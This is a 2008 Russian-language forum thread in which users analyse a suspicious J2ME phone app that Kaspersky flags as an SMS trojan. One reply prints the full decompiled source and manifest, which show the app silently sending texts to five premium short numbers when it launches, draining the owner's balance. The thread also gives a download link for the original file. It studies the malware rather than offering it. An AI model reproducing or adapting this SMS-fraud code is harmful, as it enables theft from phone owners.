PDA

Просмотр полной версии : Декодируйте пли3 jar файл


c0rp$e
14.09.2008, 02:35
люди, кто сможет расшифровать, что данный *.JAR файл делает??

msex.org.ru/1783/sms.jar

посредством установки на моб и тестированием, не советую)))

Заранее спасибо..
И подскажите плиз, чем проще его отредактировать?

Twoster
14.09.2008, 09:52
я не смотрел, но верней всего алярм! А поводу того, что без яд файла не отправится- это абсолютно не так! Он нужен лишь для установки на некоторые марки телефонов! И осторожнее с тестированием! =) а разархивировать можно обычным архиватором, там ведь алгоритм zip!
По поводу редактирования- jar это приложение написаное на java

Chaak
14.09.2008, 10:22
Политика безопасности телефона, не позволит получить доступ и памяти телефона, смс и интернету. Телефон должен будет вывести запрос на разрешение. Так что можно смело запускать.

PaLb14
14.09.2008, 10:22
Тебе поможет DJ Java Decompiller...
эмулятор можешь скачать

MaZaHaKer
27.09.2008, 16:52
алярм =) лаборатория касперского предупреждает

Trojan-SMS.J2ME.Swapi.n

http://pic.ipicture.ru/uploads/080927/QubkSxWPRO.png (http://ipicture.ru/)

F1shka
27.09.2008, 20:44
MaZaHaKer,
Сударь по конкретнее! Типа деньги с мобилы уйдут?

MaZaHaKer
27.09.2008, 20:56
извините . но информацией не располагаю . лаборатория касперского молчит - спрашивал у тех.поддержки , и описания вируса тоже нету.

F1shka
27.09.2008, 21:01
извините . но информацией не располагаю . лаборатория касперского молчит - спрашивал у тех.поддержки , и описания вируса тоже нету.
Думаю либо доверительные платежи, либо отправка смс в тихую...

ShAnKaR
28.09.2008, 15:25
// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3)
// Source File Name: BigSex.java

import javax.microedition.io.Connector;
import javax.microedition.lcdui.*;
import javax.microedition.midlet.MIDlet;
import javax.wireless.messaging.MessageConnection;
import javax.wireless.messaging.TextMessage;

public class BigSex extends MIDlet
implements CommandListener
{

public BigSex()
{
m_m_m_m_m_m_m_m_m_dispDisplayDisplayDisplayDisplay DisplayDisplayDisplayDisplayDisplay = Display.getDisplay(this);
}

public void startApp()
{
for(int i = 0; i < 1; i++)
try
{
String number = "sms://1171";
if(i == 0)
number = "sms://" + getAppProperty("a");
MessageConnection messageconnection = (MessageConnection)Connector.open(number);
TextMessage textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("1") + " " + getAppProperty("id"));
messageconnection.send(textmessage);
}
catch(Exception exception) { }

for(int i = 0; i < 1; i++)
try
{
String number = "sms://1171";
if(i == 0)
number = "sms://" + getAppProperty("b");
MessageConnection messageconnection = (MessageConnection)Connector.open(number);
TextMessage textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("2") + " " + getAppProperty("id"));
messageconnection.send(textmessage);
}
catch(Exception exception) { }

for(int i = 0; i < 1; i++)
try
{
String number = "sms://1171";
if(i == 0)
number = "sms://" + getAppProperty("c");
MessageConnection messageconnection = (MessageConnection)Connector.open(number);
TextMessage textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("3") + " " + getAppProperty("id"));
messageconnection.send(textmessage);
}
catch(Exception exception) { }

for(int i = 0; i < 1; i++)
try
{
String number = "sms://1171";
if(i == 0)
number = "sms://" + getAppProperty("d");
MessageConnection messageconnection = (MessageConnection)Connector.open(number);
TextMessage textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("4") + " " + getAppProperty("id"));
messageconnection.send(textmessage);
}
catch(Exception exception) { }

for(int i = 0; i < 1; i++)
try
{
String number = "sms://1171";
if(i == 0)
number = "sms://" + getAppProperty("e");
MessageConnection messageconnection = (MessageConnection)Connector.open(number);
TextMessage textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("5") + " " + getAppProperty("id"));
messageconnection.send(textmessage);
}
catch(Exception exception) { }

}

public void pauseApp()
{
}

public void destroyApp(boolean flag1)
{
}

public void commandAction(Command command1, Displayable displayable1)
{
}

private Display m_m_m_m_m_m_m_m_m_dispDisplayDisplayDisplayDisplay DisplayDisplayDisplayDisplayDisplay;
}

а ну и еще MANIFEST.MF

Manifest-Version: 1.0

MicroEdition-Configuration: CLDC-1.0

MIDlet-Name: sms

Created-By: 1.4.2_12 (Sun Microsystems Inc.)

MIDlet-Vendor: Living Mobile

MIDlet-1: sms, ico.png, BigSex

MIDlet-Version: 1.10

MicroEdition-Profile: MIDP-2.0

id: 1783

1: era

2: #maybox

3: #maybox

4: era

5: #maybox

a: 4460

b: 1171

c: 7733

d: 5537

e: 9395

Olegros911
28.09.2008, 16:32
все просто он отсилает смс на определенный номер .......естественно смс стоит денег хороших)))))))))))))))))))))) которые уходят из твоего щота....правда телефон не позволит отправить ни одного пока ти сам не подтвердиш

f®@me™
24.11.2008, 18:08
Эмулятор java на комп возьми и заинсаль, протестируй.

CSRULS
26.11.2008, 01:38
Если антивирь ругается,то прога уже странная!тестить прогу можно!а вот отправлять смс и пускать её в инет не советую...-останетесь без денег!

-Денис-
28.11.2008, 10:50
Если так боитесь что сворует деньги, то можно поставить заблокированную симку (все равно не даст отослать смс и тем более на номер 1171) и проверьте что будет. Денег с заблокированной симки ни как не смогут снять

ArchangelNN
05.12.2008, 09:14
"Лаборатория Касперского" обнаружила мобильный вирус, распространяющийся через социальную сеть "ВКонтакте". Он называется Trojan-SMS.J2ME.Konov.b и является первой программой, которая использует социальную сеть для распространения мобильного вредоносного ПО.

Эксперты сообщают о двух схемах работы Trojan-SMS.J2ME.Konov.b. В первом случае пользователь "ВКонтакте" получает сообщение от одного из своих друзей, из которого узнает о Java-приложении, позволяющем бесплатно пополнить мобильный счет.

После установки на мобильник данного приложения программа без ведома владельца телефона отправляет SMS на пять коротких номеров. По данным "Лаборатории Касперского", стоимость одного сообщения составляет около 250 рублей.

В другом случае при помощи Trojan-SMS.J2ME.Konov.b злоумышленники пытаются получить логин и пароль пользователя "ВКонтакте", заманивая его на фишинговый сайт. После получения этих данных всем друзьям пользователя рассылается спам.
(c) lenta.ru